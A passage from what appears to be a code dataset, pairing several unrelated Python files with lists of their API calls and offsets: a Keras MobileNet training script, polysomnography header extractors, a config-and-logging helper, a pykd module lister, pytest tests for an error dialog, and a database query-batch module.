with open(hist_json_file, mode='w') as f:
hist_df.to_json(f)
return model
def evaluate_model(model):
final_loss, final_accuracy = model.evaluate(validation_generator, steps = validation_steps_per_epoch)
print("Final Loss: ", final_loss)
print("Final accuracy: ", final_accuracy * 100)
if __name__ == '__main__':
model = get_mobile_net_model()
model = train_model(model)
evaluate_model(model)
| [
"keras.optimizers.Adam",
"keras.Sequential",
"numpy.ceil",
"keras.preprocessing.image.ImageDataGenerator",
"keras.layers.Dense",
"tensorflow_hub.KerasLayer",
"keras.layers.Dropout"
] | [((489, 525), 'keras.preprocessing.image.ImageDataGenerator', 'ImageDataGenerator', ([], {}), '(**datagen_kwargs)\n', (507, 525), False, 'from keras.preprocessing.image import ImageDataGenerator\n'), ((812, 848), 'keras.preprocessing.image.ImageDataGenerator', 'ImageDataGenerator', ([], {}), '(**datagen_kwargs)\n', (830, 848), False, 'from keras.preprocessing.image import ImageDataGenerator\n'), ((1111, 1129), 'keras.Sequential', 'keras.Sequential', ([], {}), '()\n', (1127, 1129), False, 'import keras\n'), ((1774, 1805), 'keras.optimizers.Adam', 'keras.optimizers.Adam', ([], {'lr': '(0.001)'}), '(lr=0.001)\n', (1795, 1805), False, 'import keras\n'), ((1948, 2015), 'numpy.ceil', 'np.ceil', (['(training_generator.samples / training_generator.batch_size)'], {}), '(training_generator.samples / training_generator.batch_size)\n', (1955, 2015), True, 'import numpy as np\n'), ((2064, 2135), 'numpy.ceil', 'np.ceil', (['(validation_generator.samples / validation_generator.batch_size)'], {}), '(validation_generator.samples / validation_generator.batch_size)\n', (2071, 2135), True, 'import numpy as np\n'), ((1144, 1275), 'tensorflow_hub.KerasLayer', 'hub.KerasLayer', (['"""https://tfhub.dev/google/tf2-preview/mobilenet_v2/feature_vector/4"""'], {'output_shape': '[1280]', 'trainable': '(False)'}), "(\n 'https://tfhub.dev/google/tf2-preview/mobilenet_v2/feature_vector/4',\n output_shape=[1280], trainable=False)\n", (1158, 1275), True, 'import tensorflow_hub as hub\n'), ((1313, 1325), 'keras.layers.Dropout', 'Dropout', (['(0.4)'], {}), '(0.4)\n', (1320, 1325), False, 'from keras.layers import Dropout, Dense\n'), ((1341, 1400), 'keras.layers.Dense', 'Dense', (['training_generator.num_classes'], {'activation': '"""softmax"""'}), "(training_generator.num_classes, activation='softmax')\n", (1346, 1400), False, 'from keras.layers import Dropout, Dense\n')] |
"""
A set of functions for extracting header information from PSG objects
Typically only used internally in from unet.io.header.header_extractors
Each function takes some PSG or header-like object and returns a dictionary with at least
the following keys:
{
'n_channels': int,
'channel_names': list of strings,
'sample_rate': int
'date': datetime or None
'length': int
}
Note: length gives the number of samples, divide by sample_rate to get length_sec
"""
import logging
import warnings
import numpy as np
import h5py
from datetime import datetime
from psg_utils.errors import (MissingHeaderFieldError, HeaderFieldTypeError,
LengthZeroSignalError, H5VariableAttributesError,
VariableSampleRateError, FloatSampleRateWarning)
logger = logging.getLogger(__name__)
def _assert_header(header):
"""
Checks that a standardized header:
1) contains the right field names
2) each value has an expected type
3) the 'length' value is greater than 0
Args:
header: dict
Returns: dict
"""
field_requirements = [
("n_channels", [int]),
("channel_names", [list]),
("sample_rate", [int]),
("date", [datetime, type(None)]),
("length", [int])
]
for field, valid_types in field_requirements:
if field not in header:
raise MissingHeaderFieldError(f"Missing value '{field}' from header '{header}'. "
"This could be an error in the code implementation. "
"Please raise this issue on GitHub.")
type_ = type(header[field])
if type_ not in valid_types:
raise HeaderFieldTypeError(f"Field {field} of type {type_} was not expected, expected one of {valid_types}")
if header['length'] <= 0:
raise LengthZeroSignalError(f"Expected key 'length' to be a non-zero integer, "
f"but header {header} has value {header['length']}")
# Warn on duplicate channels
from psg_utils.io.channels.utils import check_duplicate_channels
check_duplicate_channels(header['channel_names'], raise_or_warn="warn")
return header
def _sample_rate_as_int(sample_rate, raise_or_warn='warn'):
"""
Returns the sample rate rounded to the nearest whole integer.
If the integer sample rate is not exactly (as determined by np.isclose) equal to the original,
possibly floating, value an warning is issued if raise_or_warn="warn" or an FloatSampleRateError
is raised if raise_or_warn="raise".
Raises ValueError if raise_or_warn not in ('raise', 'warn', 'warning').
Args:
sample_rate: int, float sample rate
Returns:
sample_rate, int
"""
new_sample_rate = int(np.round(sample_rate))
if not np.isclose(new_sample_rate, sample_rate):
s = f"The loaded file has a float sample rate of value {sample_rate} which is not exactly equal to the " \
f"rounded integer value of {new_sample_rate}. Please note: Integer value {new_sample_rate} will be used."
if raise_or_warn.lower() == "raise":
raise FloatSampleRateWarning(s)
elif raise_or_warn.lower() in ("warn", "warning"):
warnings.warn(s, FloatSampleRateWarning)
else:
raise ValueError("raise_or_warn argument must be one of 'raise' or 'warn'.")
return new_sample_rate
def _standardized_edf_header(raw_edf, channel_names_overwrite=None):
"""
Header extraction function for RawEDF and Raw objects.
Reads the number of channels, channel names and sample rate properties
If existing, reads the date information as well.
channel_names_overwrite allows passing a list of channel names to use instead of
those loaded by MNE per default. This is useful e.g. to set the raw EDF names in the
header instead of the truncated / renamed (on duplicates) used by MNE.
Returns:
Header information as dict
"""
# Each tuple below follows the format:
# 1) output name, 2) edf_obj name, 3) function to apply to the read
# value, 4) whether a missing value should raise an error.
header_map = [("n_channels", "nchan", int, True),
("channel_names", "ch_names", list, True),
("sample_rate", "sfreq", _sample_rate_as_int, True),
("date", "meas_date", datetime.utcfromtimestamp, False)]
if isinstance(raw_edf.info["meas_date"], (tuple, list)):
assert raw_edf.info["meas_date"][1] == 0
raw_edf.info["meas_date"] = raw_edf.info["meas_date"][0]
header = {}
for renamed, org, transform, raise_err in header_map:
value = raw_edf.info.get(org)
try:
value = transform(value)
except Exception as e:
if raise_err:
raise HeaderFieldTypeError("Missing or invalid value in EDF file for key {} "
"- got {}".format(org, value)) from e
header[renamed] = value
header["length"] = len(raw_edf)
header["channel_names"] = list(channel_names_overwrite) or header["channel_names"]
return _assert_header(header)
def _standardized_wfdb_header(wfdb_record):
"""
Header extraction function for WFDB Record objects.
Reads the number of channels, channel names and sample rate properties
If existing, reads the date information as well.
Returns:
Header information as dict
"""
# Each tuple below follows the format:
# 1) output name, 2) record_obj name, 3) function to apply to the read
# value, 4) whether a missing value should raise an error.
header_map = [("n_channels", "n_sig", int, True),
("channel_names", "sig_name", list, True),
("sample_rate", "fs", _sample_rate_as_int, True),
("date", "base_date", datetime.utcfromtimestamp, False),
("length", "sig_len", int, True)]
header = {}
for renamed, org, transform, raise_err in header_map:
value = getattr(wfdb_record, org, None)
try:
value = transform(value)
except Exception as e:
if raise_err:
raise HeaderFieldTypeError("Missing or invalid value in WFDB file for key {} "
"- got {}".format(org, value)) from e
header[renamed] = value
return _assert_header(header)
def _traverse_h5_file(root_node, attributes=None):
attributes = dict((attributes or {}))
attributes.update(root_node.attrs)
results = {}
if isinstance(root_node, h5py.Dataset):
# Leaf node
attributes["length"] = len(root_node)
results[root_node.name] = attributes
else:
for key in root_node:
results.update(_traverse_h5_file(root_node[key], attributes))
return results
def _get_unique_value(items):
"""
Takes a list of items, checks that all are equal (in value, ==) and returns the unique value.
Returns None if the list is empty.
Raises ValueError if not all items are not equal.
Args:
items: List
Returns:
The unique item in list
"""
if len(items) == 0:
return None
for item in items[1:]:
if item != items[0]:
raise H5VariableAttributesError(f"The input list '{items}' contains more than 1 unique value")
return items[0]
def _standardized_h5_header(h5_file, channel_group_name="channels"):
"""
Header extraction function for h5py.File objects.
The object must:
- Have an attribute 'sample_rate'
- Have a group named {channel_group_name} which stores the data for all channels as
Dataset entries under the group (can be nested in deeper groups too)
Can have:
- An attribute 'date' which gives a date string or unix timestamp integer
Currently raises an error if any attribute in ('date', 'sample_rate', 'length') are not equal among all
datasets in the archive.
All attributes may be set at any node, and will affect any non-attributed node deeper in the tree.
E.g. setting the 'sample_rate' attribute on the root note will have it affect all datasets, unless
the attribute is set on deeper nodes too in which case the later will overwrite the root attribute for
all its nested, un-attributed children.
Returns:
Header information as dict
"""
# Traverse the h5 archive for datasets and assigned attributes
h5_content = _traverse_h5_file(h5_file[channel_group_name], attributes=h5_file.attrs)
header = {
"channel_names": [],
"channel_paths": {}, # will store channel_name: channel path entries
"sample_rate": [],
"date": [],
"length": []
}
for channel_path, attributes in h5_content.items():
channel_name = channel_path.split("/")[-1]
header["channel_paths"][channel_name] = channel_path
header["channel_names"].append(channel_name)
header["sample_rate"].append(attributes.get("sample_rate"))
header["date"].append(attributes.get("date"))
header["length"].append(attributes.get("length"))
header["n_channels"] = len(h5_content)
# Ensure all dates, lengths and sample rate attributes are equal
# TODO: Remove this restriction at least for sample rates; requires handling at PSG loading time
try:
header["date"] = _get_unique_value(header["date"])
header["sample_rate"] = _sample_rate_as_int(_get_unique_value(header["sample_rate"]))
header["length"] = int(_get_unique_value(header["length"]))
except H5VariableAttributesError as e:
raise H5VariableAttributesError("Datasets stored in the specified H5 archive differ with respect to one or "
"multiple of the following attributes: 'date', 'sampling_rate', 'length'. "
"All datasets must currently match with respect to those attributes.") from e
# Get datetime date or set to None
date = header["date"]
if not isinstance(date, str) and (isinstance(date, int) or np.issubdtype(date, np.integer)):
date = datetime.utcfromtimestamp(date)
elif not isinstance(date, datetime):
date = None
header["date"] = date
return _assert_header(header)
def _standardized_bin_header(raw_header):
"""
Header extraction function for custom dict type headers for data in .bin files.
Raw header has structure:
{"CHX": [list of channel inds], "NAME": [list of channel names],
"TYPE": [list of channel types], "FS": [list of channel sample rates]}
All values stored in the header are strings and should be cast to ints. etc as appropriate
for header standardization.
Currently raises an error if all attribute in header["FS"] are not equal
(i.e., same sample rate is required for all channels).
Returns:
Header information as dict
"""
# Assert upper case keys
raw_header = {key.upper(): values for key, values in raw_header.items()}
# Order header entries according to CHX column
order = np.argsort(np.array(raw_header['CHX'], dtype=np.int))
raw_header = {key: ([entry[i] for i in order]
if isinstance(entry, (list, tuple, np.ndarray))
else entry)
for key, entry in raw_header.items()}
# Assert that all samples rates are equal
sample_rates = np.array(raw_header["FS"], dtype=np.int32)
if not (sample_rates[0] == sample_rates).all():
raise VariableSampleRateError(f"Sample rates in header {raw_header} are not "
f"all equal with rates: {sample_rates}. "
f"The data loaders for .bin formatted files currently "
f"support only files with all channels sampled at equal rates.")
# Build standardized header
header = {
"n_channels": len(raw_header["NAME"]),
"channel_names": list(raw_header["NAME"]),
"sample_rate": _sample_rate_as_int(sample_rates[0]),
"date": None,
"length": int(raw_header["LENGTH"]),
"channel_types": [type_.upper() for type_ in raw_header.get("TYPE", [])]
}
return _assert_header(header)
| [
"logging.getLogger",
"datetime.datetime.utcfromtimestamp",
"psg_utils.errors.VariableSampleRateError",
"numpy.isclose",
"psg_utils.io.channels.utils.check_duplicate_channels",
"numpy.array",
"psg_utils.errors.HeaderFieldTypeError",
"numpy.issubdtype",
"psg_utils.errors.FloatSampleRateWarning",
"wa... | [((821, 848), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (838, 848), False, 'import logging\n'), ((2174, 2245), 'psg_utils.io.channels.utils.check_duplicate_channels', 'check_duplicate_channels', (["header['channel_names']"], {'raise_or_warn': '"""warn"""'}), "(header['channel_names'], raise_or_warn='warn')\n", (2198, 2245), False, 'from psg_utils.io.channels.utils import check_duplicate_channels\n'), ((11568, 11610), 'numpy.array', 'np.array', (["raw_header['FS']"], {'dtype': 'np.int32'}), "(raw_header['FS'], dtype=np.int32)\n", (11576, 11610), True, 'import numpy as np\n'), ((1905, 2037), 'psg_utils.errors.LengthZeroSignalError', 'LengthZeroSignalError', (['f"""Expected key \'length\' to be a non-zero integer, but header {header} has value {header[\'length\']}"""'], {}), '(\n f"Expected key \'length\' to be a non-zero integer, but header {header} has value {header[\'length\']}"\n )\n', (1926, 2037), False, 'from psg_utils.errors import MissingHeaderFieldError, HeaderFieldTypeError, LengthZeroSignalError, H5VariableAttributesError, VariableSampleRateError, FloatSampleRateWarning\n'), ((2845, 2866), 'numpy.round', 'np.round', (['sample_rate'], {}), '(sample_rate)\n', (2853, 2866), True, 'import numpy as np\n'), ((2879, 2919), 'numpy.isclose', 'np.isclose', (['new_sample_rate', 'sample_rate'], {}), '(new_sample_rate, sample_rate)\n', (2889, 2919), True, 'import numpy as np\n'), ((10270, 10301), 'datetime.datetime.utcfromtimestamp', 'datetime.utcfromtimestamp', (['date'], {}), '(date)\n', (10295, 10301), False, 'from datetime import datetime\n'), ((11245, 11286), 'numpy.array', 'np.array', (["raw_header['CHX']"], {'dtype': 'np.int'}), "(raw_header['CHX'], dtype=np.int)\n", (11253, 11286), True, 'import numpy as np\n'), ((11677, 11909), 'psg_utils.errors.VariableSampleRateError', 'VariableSampleRateError', (['f"""Sample rates in header {raw_header} are not all equal with rates: {sample_rates}. The data loaders for .bin formatted files currently support only files with all channels sampled at equal rates."""'], {}), "(\n f'Sample rates in header {raw_header} are not all equal with rates: {sample_rates}. The data loaders for .bin formatted files currently support only files with all channels sampled at equal rates.'\n )\n", (11700, 11909), False, 'from psg_utils.errors import MissingHeaderFieldError, HeaderFieldTypeError, LengthZeroSignalError, H5VariableAttributesError, VariableSampleRateError, FloatSampleRateWarning\n'), ((1415, 1586), 'psg_utils.errors.MissingHeaderFieldError', 'MissingHeaderFieldError', (['f"""Missing value \'{field}\' from header \'{header}\'. This could be an error in the code implementation. Please raise this issue on GitHub."""'], {}), '(\n f"Missing value \'{field}\' from header \'{header}\'. This could be an error in the code implementation. Please raise this issue on GitHub."\n )\n', (1438, 1586), False, 'from psg_utils.errors import MissingHeaderFieldError, HeaderFieldTypeError, LengthZeroSignalError, H5VariableAttributesError, VariableSampleRateError, FloatSampleRateWarning\n'), ((1758, 1870), 'psg_utils.errors.HeaderFieldTypeError', 'HeaderFieldTypeError', (['f"""Field {field} of type {type_} was not expected, expected one of {valid_types}"""'], {}), "(\n f'Field {field} of type {type_} was not expected, expected one of {valid_types}'\n )\n", (1778, 1870), False, 'from psg_utils.errors import MissingHeaderFieldError, HeaderFieldTypeError, LengthZeroSignalError, H5VariableAttributesError, VariableSampleRateError, FloatSampleRateWarning\n'), ((3217, 3242), 'psg_utils.errors.FloatSampleRateWarning', 'FloatSampleRateWarning', (['s'], {}), '(s)\n', (3239, 3242), False, 'from psg_utils.errors import MissingHeaderFieldError, HeaderFieldTypeError, LengthZeroSignalError, H5VariableAttributesError, VariableSampleRateError, FloatSampleRateWarning\n'), ((7383, 7476), 'psg_utils.errors.H5VariableAttributesError', 'H5VariableAttributesError', (['f"""The input list \'{items}\' contains more than 1 unique value"""'], {}), '(\n f"The input list \'{items}\' contains more than 1 unique value")\n', (7408, 7476), False, 'from psg_utils.errors import MissingHeaderFieldError, HeaderFieldTypeError, LengthZeroSignalError, H5VariableAttributesError, VariableSampleRateError, FloatSampleRateWarning\n'), ((9755, 10008), 'psg_utils.errors.H5VariableAttributesError', 'H5VariableAttributesError', (['"""Datasets stored in the specified H5 archive differ with respect to one or multiple of the following attributes: \'date\', \'sampling_rate\', \'length\'. All datasets must currently match with respect to those attributes."""'], {}), '(\n "Datasets stored in the specified H5 archive differ with respect to one or multiple of the following attributes: \'date\', \'sampling_rate\', \'length\'. All datasets must currently match with respect to those attributes."\n )\n', (9780, 10008), False, 'from psg_utils.errors import MissingHeaderFieldError, HeaderFieldTypeError, LengthZeroSignalError, H5VariableAttributesError, VariableSampleRateError, FloatSampleRateWarning\n'), ((10221, 10252), 'numpy.issubdtype', 'np.issubdtype', (['date', 'np.integer'], {}), '(date, np.integer)\n', (10234, 10252), True, 'import numpy as np\n'), ((3314, 3354), 'warnings.warn', 'warnings.warn', (['s', 'FloatSampleRateWarning'], {}), '(s, FloatSampleRateWarning)\n', (3327, 3354), False, 'import warnings\n')] |
import sys,os
import json
import logging as log
import socket
from collections import OrderedDict
import datetime
from platform import system as system_name # Returns the system/OS name
from subprocess import call as system_call # Execute a shell command
def ping(host):
"""
Returns True if host (str) responds to a ping request.
Remember that a host may not respond to a ping (ICMP) request even if the host name is valid.
"""
# Ping command count option as function of OS
param = '-n' if system_name().lower()=='windows' else '-c'
# Building the command. Ex: "ping -c 1 google.com"
command = ['ping', param, '1', host]
# Pinging
return system_call(command) == 0
# -------------------- config --------------------
def get_local_json():
"""fetches the config.json file in the local directory
if config_hostname.json is found it is used over the default one
"""
config = None
dirname = os.path.dirname(sys.argv[0])
if(len(dirname) == 0):
dirname = "."
config_file = dirname+'/'+"config_"+socket.gethostname()+".json"
if(os.path.isfile(config_file)):
print("loading: ",config_file)
config = json.load(open(config_file))
else:
config_file = dirname+'/'+"config.json"
if(os.path.isfile(config_file)):
print("loading: %s",config_file)
config = json.load(open(config_file))
else:
print("Fatal error 'config.json' not found")
return config
# -------------------- config --------------------
def get_local_nodes(nodes_file):
nodes = json.load(open(nodes_file),object_pairs_hook=OrderedDict)
return nodes
def configure_log(logger_name):
global_config = get_local_json()
config = global_config["log"]
log_level_map = {
"Debug" :10,
"Info" :20,
"Warning" :30,
"Error" :40,
"Critical" :50
}
#if(os.path.isfile(config["logfile"])):
for handler in log.root.handlers[:]:
log.root.removeHandler(handler)
log.basicConfig( filename=config["logfile"],
level=log_level_map[config["level"]],
format='%(asctime)s %(name)s %(levelname)-8s %(message)s',
datefmt='%d %H:%M:%S'
)
log.getLogger('').addHandler(log.StreamHandler())
log.info("====> '%s' started logging with level '%s' @ '%s'"%(logger_name,config["level"],str(datetime.datetime.utcnow())))
#else:
# print("Log file not available : %s"%(config["logfile"]))
return global_config
| [
"logging.basicConfig",
"logging.getLogger",
"logging.StreamHandler",
"datetime.datetime.utcnow",
"os.path.isfile",
"os.path.dirname",
"platform.system",
"subprocess.call",
"logging.root.removeHandler",
"socket.gethostname"
] | [((961, 989), 'os.path.dirname', 'os.path.dirname', (['sys.argv[0]'], {}), '(sys.argv[0])\n', (976, 989), False, 'import sys, os\n'), ((1115, 1142), 'os.path.isfile', 'os.path.isfile', (['config_file'], {}), '(config_file)\n', (1129, 1142), False, 'import sys, os\n'), ((2071, 2243), 'logging.basicConfig', 'log.basicConfig', ([], {'filename': "config['logfile']", 'level': "log_level_map[config['level']]", 'format': '"""%(asctime)s %(name)s %(levelname)-8s %(message)s"""', 'datefmt': '"""%d %H:%M:%S"""'}), "(filename=config['logfile'], level=log_level_map[config[\n 'level']], format='%(asctime)s %(name)s %(levelname)-8s %(message)s',\n datefmt='%d %H:%M:%S')\n", (2086, 2243), True, 'import logging as log\n'), ((689, 709), 'subprocess.call', 'system_call', (['command'], {}), '(command)\n', (700, 709), True, 'from subprocess import call as system_call\n'), ((1299, 1326), 'os.path.isfile', 'os.path.isfile', (['config_file'], {}), '(config_file)\n', (1313, 1326), False, 'import sys, os\n'), ((2035, 2066), 'logging.root.removeHandler', 'log.root.removeHandler', (['handler'], {}), '(handler)\n', (2057, 2066), True, 'import logging as log\n'), ((2369, 2388), 'logging.StreamHandler', 'log.StreamHandler', ([], {}), '()\n', (2386, 2388), True, 'import logging as log\n'), ((1079, 1099), 'socket.gethostname', 'socket.gethostname', ([], {}), '()\n', (1097, 1099), False, 'import socket\n'), ((2340, 2357), 'logging.getLogger', 'log.getLogger', (['""""""'], {}), "('')\n", (2353, 2357), True, 'import logging as log\n'), ((523, 536), 'platform.system', 'system_name', ([], {}), '()\n', (534, 536), True, 'from platform import system as system_name\n'), ((2488, 2514), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (2512, 2514), False, 'import datetime\n')] |
#
# Modules Info
#
import pykd
moduleList = []
def reloadModules():
global moduleList
for m in moduleList: globals()[ m.name().lower() ] = None
if pykd.isKernelDebugging():
global nt
nt = pykd.loadModule("nt")
modules = pykd.typedVarList( nt.PsLoadedModuleList, "nt", "_LDR_DATA_TABLE_ENTRY", "InLoadOrderLinks" )
moduleList.append( nt )
else:
ntdll = pykd.loadModule("ntdll")
peb = pykd.typedVar( "ntdll", "_PEB", pykd.getCurrentProcess() )
ldr = pykd.typedVar( "ntdll", "_PEB_LDR_DATA", peb.Ldr )
modules = pykd.typedVarList( ldr.InLoadOrderModuleList.getAddress(), "ntdll", "_LDR_DATA_TABLE_ENTRY", "InLoadOrderLinks" )
moduleList = []
for m in modules:
baseName = str( pykd.loadUnicodeString( m.BaseDllName.getAddress() ) )
if baseName=="ntoskrnl.exe":
continue
module = pykd.findModule( m.DllBase )
globals()[ module.name().lower() ] = module
moduleList.append( module )
def printModuleList():
pykd.dprintln( "\n".join( [ str(m) for m in moduleList ] ) )
reloadModules()
| [
"pykd.typedVarList",
"pykd.loadModule",
"pykd.typedVar",
"pykd.getCurrentProcess",
"pykd.findModule",
"pykd.isKernelDebugging"
] | [((202, 226), 'pykd.isKernelDebugging', 'pykd.isKernelDebugging', ([], {}), '()\n', (224, 226), False, 'import pykd\n'), ((266, 287), 'pykd.loadModule', 'pykd.loadModule', (['"""nt"""'], {}), "('nt')\n", (281, 287), False, 'import pykd\n'), ((309, 404), 'pykd.typedVarList', 'pykd.typedVarList', (['nt.PsLoadedModuleList', '"""nt"""', '"""_LDR_DATA_TABLE_ENTRY"""', '"""InLoadOrderLinks"""'], {}), "(nt.PsLoadedModuleList, 'nt', '_LDR_DATA_TABLE_ENTRY',\n 'InLoadOrderLinks')\n", (326, 404), False, 'import pykd\n'), ((478, 502), 'pykd.loadModule', 'pykd.loadModule', (['"""ntdll"""'], {}), "('ntdll')\n", (493, 502), False, 'import pykd\n'), ((596, 644), 'pykd.typedVar', 'pykd.typedVar', (['"""ntdll"""', '"""_PEB_LDR_DATA"""', 'peb.Ldr'], {}), "('ntdll', '_PEB_LDR_DATA', peb.Ldr)\n", (609, 644), False, 'import pykd\n'), ((999, 1025), 'pykd.findModule', 'pykd.findModule', (['m.DllBase'], {}), '(m.DllBase)\n', (1014, 1025), False, 'import pykd\n'), ((552, 576), 'pykd.getCurrentProcess', 'pykd.getCurrentProcess', ([], {}), '()\n', (574, 576), False, 'import pykd\n')] |
"""Test module for the Error dialog widget."""
import os
import logging
import pytest
from PySide2.QtGui import QClipboard
from src.widgets import error_dialog
from src.about import about_to_string
@pytest.fixture()
def error_log_path(_package):
"""Get the log directory path."""
yield os.path.join(_package, 'src', 'log', 'errors.log')
@pytest.fixture(name='report')
def create_report(qtbot, error_log_path):
"""Initialize the ErrorDialog class and create an error report.
After tests, will clean the error.logs file.
Yields:
Report: a namedtuple with the link and the port attributes.
"""
widget = error_dialog.ErrorDialog('Test Error')
qtbot.addWidget(widget)
yield widget.prepare_report()
with open(error_log_path, 'w') as _:
pass
def test_report_return_value(report):
"""Check if prepare report return is a tuple."""
assert isinstance(report, tuple)
def test_prepare_report_link(report):
"""Check if error dialog returns the issues link when clicking Report."""
assert report.link == 'https://github.com/sisoe24/NukeServerSocket/issues'
def test_prepare_report_clipboard(report):
"""Check if report gets copied into clipboard."""
assert 'NukeServerSocket' in QClipboard().text()
def test_prepare_report_file(report, error_log_path):
"""Check if the report file has the about to string information."""
with open(error_log_path) as file:
assert about_to_string() in file.read()
def test_get_critical_logger():
"""Check if method returns the critical logger file handler."""
logger = error_dialog._get_critical_logger()
assert logger.name == 'Critical'
assert isinstance(logger, logging.FileHandler)
| [
"src.widgets.error_dialog.ErrorDialog",
"src.widgets.error_dialog._get_critical_logger",
"os.path.join",
"PySide2.QtGui.QClipboard",
"pytest.fixture",
"src.about.about_to_string"
] | [((204, 220), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (218, 220), False, 'import pytest\n'), ((353, 382), 'pytest.fixture', 'pytest.fixture', ([], {'name': '"""report"""'}), "(name='report')\n", (367, 382), False, 'import pytest\n'), ((645, 683), 'src.widgets.error_dialog.ErrorDialog', 'error_dialog.ErrorDialog', (['"""Test Error"""'], {}), "('Test Error')\n", (669, 683), False, 'from src.widgets import error_dialog\n'), ((1611, 1646), 'src.widgets.error_dialog._get_critical_logger', 'error_dialog._get_critical_logger', ([], {}), '()\n', (1644, 1646), False, 'from src.widgets import error_dialog\n'), ((299, 349), 'os.path.join', 'os.path.join', (['_package', '"""src"""', '"""log"""', '"""errors.log"""'], {}), "(_package, 'src', 'log', 'errors.log')\n", (311, 349), False, 'import os\n'), ((1463, 1480), 'src.about.about_to_string', 'about_to_string', ([], {}), '()\n', (1478, 1480), False, 'from src.about import about_to_string\n'), ((1261, 1273), 'PySide2.QtGui.QClipboard', 'QClipboard', ([], {}), '()\n', (1271, 1273), False, 'from PySide2.QtGui import QClipboard\n')] |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from enum import Enum
from typing import List # noqa
from datetime import datetime
import uuid
import sqlparse
from ossdbtoolsservice.driver import ServerConnection
from ossdbtoolsservice.utils.time import get_time_str, get_elapsed_time_str
from ossdbtoolsservice.query.contracts import BatchSummary, SaveResultsRequestParams, SelectionData
from ossdbtoolsservice.query.result_set import ResultSet # noqa
from ossdbtoolsservice.query.file_storage_result_set import FileStorageResultSet
from ossdbtoolsservice.query.in_memory_result_set import InMemoryResultSet
from ossdbtoolsservice.query.data_storage import FileStreamFactory
from ossdbtoolsservice.utils.constants import PG_PROVIDER_NAME
class ResultSetStorageType(Enum):
IN_MEMORY = 1,
FILE_STORAGE = 2
class BatchEvents:
def __init__(self, on_execution_started=None, on_execution_completed=None, on_result_set_completed=None):
self._on_execution_started = on_execution_started
self._on_execution_completed = on_execution_completed
self._on_result_set_completed = on_result_set_completed
class SelectBatchEvents(BatchEvents):
def __init__(self, on_execution_started, on_execution_completed, on_result_set_completed, on_after_first_fetch):
BatchEvents.__init__(self, on_execution_started, on_execution_completed, on_result_set_completed)
self._on_after_first_fetch = on_after_first_fetch
class Batch:
def __init__(
self,
batch_text: str,
ordinal: int,
selection: SelectionData,
batch_events: BatchEvents = None,
storage_type: ResultSetStorageType = ResultSetStorageType.FILE_STORAGE
) -> None:
self.id = ordinal
self.selection = selection
self.batch_text = batch_text
self._execution_start_time: datetime = None
self._has_error = False
self._has_executed = False
self._execution_end_time: datetime = None
self._result_set: ResultSet = None
self._notices: List[str] = []
self._batch_events = batch_events
self._storage_type = storage_type
@property
def batch_summary(self) -> BatchSummary:
return BatchSummary.from_batch(self)
@property
def has_error(self) -> bool:
return self._has_error
@property
def has_executed(self) -> bool:
return self._has_executed
@property
def start_date_str(self) -> str:
if self._execution_start_time is None:
return None
return self._execution_start_time.isoformat()
@property
def start_time(self) -> str:
return get_time_str(self._execution_start_time)
@property
def end_time(self) -> str:
return get_time_str(self._execution_end_time)
@property
def elapsed_time(self) -> str:
return get_elapsed_time_str(self._execution_start_time, self._execution_end_time)
@property
def result_set(self) -> ResultSet:
return self._result_set
@property
def row_count(self) -> int:
return self.result_set.row_count if self.result_set is not None else -1
@property
def notices(self) -> List[str]:
return self._notices
def get_cursor(self, connection: ServerConnection):
return connection.cursor()
def execute(self, conn: ServerConnection) -> None:
"""
Execute the batch using a cursor retrieved from the given connection
:raises DatabaseError: if an error is encountered while running the batch's query
"""
self._execution_start_time = datetime.now()
if self._batch_events and self._batch_events._on_execution_started:
self._batch_events._on_execution_started(self)
cursor = self.get_cursor(conn)
try:
cursor.execute(self.batch_text)
# Commit the transaction if autocommit is True
if conn.autocommit:
conn.commit()
self.after_execute(cursor)
except conn.database_error as error:
self._has_error = True
raise error
finally:
# We are doing this because when the execute fails for named cursors
# cursor is not activated on the server which results in failure on close
# Hence we are checking if the cursor was really executed for us to close it
if cursor and cursor.rowcount != -1 and cursor.rowcount is not None:
cursor.close()
self._has_executed = True
self._execution_end_time = datetime.now()
# TODO: PyMySQL doesn't support notices from a connection
if conn._provider_name == PG_PROVIDER_NAME:
self._notices = cursor.connection.notices
cursor.connection.notices = []
if self._batch_events and self._batch_events._on_execution_completed:
self._batch_events._on_execution_completed(self)
def after_execute(self, cursor) -> None:
if cursor.description is not None:
self.create_result_set(cursor)
def create_result_set(self, cursor):
result_set = create_result_set(self._storage_type, 0, self.id)
result_set.read_result_to_end(cursor)
self._result_set = result_set
def get_subset(self, start_index: int, end_index: int):
return self._result_set.get_subset(start_index, end_index)
def save_as(self, params: SaveResultsRequestParams, file_factory: FileStreamFactory, on_success, on_failure) -> None:
if params.result_set_index != 0:
raise IndexError('Result set index should be always 0')
self._result_set.save_as(params, file_factory, on_success, on_failure)
class SelectBatch(Batch):
def __init__(self, batch_text: str, ordinal: int, selection: SelectionData, batch_events: SelectBatchEvents, storage_type: ResultSetStorageType) -> None:
Batch.__init__(self, batch_text, ordinal, selection, batch_events, storage_type)
def get_cursor(self, connection: ServerConnection):
cursor_name = str(uuid.uuid4())
# Named cursors can be created only in the transaction. As our connection has autocommit set to true
# there is not transaction concept with it so we need to have withhold to true and as this cursor is local
# and we explicitly close it we are good
return connection.cursor(name=cursor_name, withhold=True)
def after_execute(self, cursor) -> None:
super().create_result_set(cursor)
def create_result_set(storage_type: ResultSetStorageType, result_set_id: int, batch_id: int) -> ResultSet:
if storage_type is ResultSetStorageType.FILE_STORAGE:
return FileStorageResultSet(result_set_id, batch_id)
return InMemoryResultSet(result_set_id, batch_id)
def create_batch(batch_text: str, ordinal: int, selection: SelectionData, batch_events: BatchEvents, storage_type: ResultSetStorageType) -> Batch:
sql = sqlparse.parse(batch_text)
statement = sql[0]
if statement.get_type().lower() == 'select':
into_checker = [True for token in statement.tokens if token.normalized == 'INTO']
cte_checker = [True for token in statement.tokens if token.ttype == sqlparse.tokens.Keyword.CTE]
if len(into_checker) == 0 and len(cte_checker) == 0: # SELECT INTO and CTE keywords can't be used in named cursor
return SelectBatch(batch_text, ordinal, selection, batch_events, storage_type)
return Batch(batch_text, ordinal, selection, batch_events, storage_type)
| [
"ossdbtoolsservice.utils.time.get_elapsed_time_str",
"ossdbtoolsservice.query.contracts.BatchSummary.from_batch",
"uuid.uuid4",
